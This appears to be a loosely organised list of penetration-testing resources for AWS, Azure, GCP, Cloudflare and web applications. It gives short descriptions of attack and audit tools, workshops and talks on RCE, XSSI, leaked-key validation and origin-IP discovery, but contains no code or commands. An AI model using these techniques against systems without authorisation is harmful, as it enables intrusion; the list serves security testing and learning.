- This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute. Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.
- Nimbostratus
- Tools for fingerprinting and exploiting Amazon cloud infrastructures
- cloudfrunt
- A tool for identifying misconfigured CloudFront domains
- cred_scanner
- A simple command line tool for finding AWS credentials in files. Optimized for use with Jenkins and other CI systems.
- Scout2
- Training
- AWS Security Workshops
- Here you'll find a collection of security workshops and other hands-on content that will guide you through prepared scenarios that represent common use cases and security operational tasks on Amazon Web Services (AWS). The workshops closely align with the NIST Cyber Security Framework and will provide a deep dive into a variety of AWS security services, techniques, and best practices that'll you'll be able to apply to your own environments to better improve your security posture.
- Serverless Security Workshop
- In this workshop, you will learn techniques to secure a serverless application built with AWS Lambda, Amazon API Gateway and RDS Aurora.
- AWS Security Workshops
- 101
- Documentation
- Articles/Writeups
- Presentations/Talks/Videos
- Tools
- Azurite - Azurite Explorer and Azurite Visualizer
- consists of two helper scripts: Azurite Explorer and Azurite Visualizer. The scripts are used to collect, passively, verbose information of the main components within a deployment to be reviewed offline, and visulise the assosiation between the resources using an interactive representation. One of the main features of the visual representation is to provide a quick way to identify insecure Network Security Groups (NSGs) in a subnet or Virtual Machine configuration.
- Azurite - Azurite Explorer and Azurite Visualizer
- 101
- Articles/Blogposts/Writeups
- Tools
- CloudFlair
- CloudFlair is a tool to find origin servers of websites protected by CloudFlare who are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should. The tool uses Internet-wide scan data from Censys to find exposed IPv4 hosts presenting an SSL certificate associated with the target's domain name.
- CloudFire
- This project focuses on discovering potential IP's leaking from behind cloud-proxied services, e.g. Cloudflare. Although there are many ways to tackle this task, we are focusing right now on CrimeFlare database lookups, search engine scraping and other enumeration techniques.
- CloudFlair
- Articles/Writeups
- Presentations/Talks/Videos
- Tools
- Attacking
- Introducing G-Scout
- G-Scout is a tool to help assess the security of Google Cloud Platform (GCP) environment configurations. By leveraging the Google Cloud API, G-Scout automatically gathers a variety of configuration data and analyzes this data to determine security risks. It produces HTML output.
- Google Cloud Platform Security Tool
- Introducing G-Scout
- Securing
- Google Cloud Security Scanner
- Cloud Security Scanner is a web security scanner for common vulnerabilities in Google App Engine applications. It can automatically scan and detect four common vulnerabilities, including cross-site-scripting (XSS), Flash injection, mixed content (HTTP in HTTPS), and outdated/insecure libraries. It enables early identification and delivers very low false positive rates. You can easily setup, run, schedule, and manage security scans and it is free for Google Cloud Platform users.
- Hayat
- Google Cloud Platform Auditing & Hardening Script
- Google Cloud Security Scanner
- Attacking
-
Analyzing a Creative Attack Chain Used To Compromise A Web Application
-
RCE in Hubspot with EL injection in HubL - betterhacker.com
- "This is the story of how I was able to get remote code execution on Hubspot's servers by exploiting a vulnerability in HubL expression language, which is used for creating templates and custom modules within the Hubspot CRM."
-
Tools
- Boucan: A Bug Bounty Canary Platform
- This project is an attempt to implement a lightweight burp collaborator-esc application and consists of two main components: a DNS Server (Custom Python Implemention with dnslib) and an API. It is still very much in the early days of development. You can think of Boucan as sort of a Canary that will notify you when an external asset (DNS Record, HTTP Server, SMTP Server) has been interacted with. This is useful for blind payload injection.
- Keyhacks
- Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
- Boucan: A Bug Bounty Canary Platform
-
Building a 1-Day Exploit for Google Chrome - Brian Pak, Andrew Wesie
- 101
- A/B/W
https://d1.awsstatic.com/whitepapers/Security/AWS_Security_Whitepaper.pdf https://d1.awsstatic.com/whitepapers/Storage/AWS%20Storage%20Services%20Whitepaper-v9.pdf
-
Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)
- Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exists and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns, policy structures and explains how to bypass them which have netted him over $45,000 in bug bounties.
-
Turtles All The Way Down: Storing Secrets in the Cloud and in the Data Center - Daniel Somerfield
-
- This document defines an interface definition language, Web IDL, that can be used to describe interfaces that are intended to be implemented in web browsers. Web IDL is an IDL variant with a number of features that allow the behavior of common script objects in the web platform to be specified more readily. How interfaces described with Web IDL correspond to constructs within ECMAScript execution environments is also detailed in this document. It is expected that this document acts as a guide to implementors of already-published specifications, and that newly published specifications reference this document to ensure conforming implementations of interfaces are interoperable.
-
- The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.
- Fuzzing JSON Web Services: Simple guide how to fuzz JSON web services properly - secapps
- XSSI and JSONP leaks
Add links to SSL/TLS RFCs
Homograph attacks
XSSI
-
The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin
- Two keys components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.
-
- 0d1n is a tool for automating customized attacks against web applications.